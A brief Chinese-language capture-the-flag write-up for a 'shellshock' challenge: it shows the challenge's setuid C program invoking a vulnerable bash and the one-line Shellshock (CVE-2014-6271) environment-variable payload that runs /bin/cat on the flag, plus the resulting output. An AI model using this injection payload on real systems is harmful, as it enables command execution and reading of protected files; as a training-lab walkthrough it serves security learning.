Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)

看到題目標題已經有頭緒了,是bash shellshock漏洞的題目,進到題目主機後查看原始碼:

1
2
3
4
5
6
7
#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

果然是得利用Shellshock來構造payload,Shellshock的payload非常簡單:

1
2
3
$ env a='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

Shellshock的細節可以參考 維基百科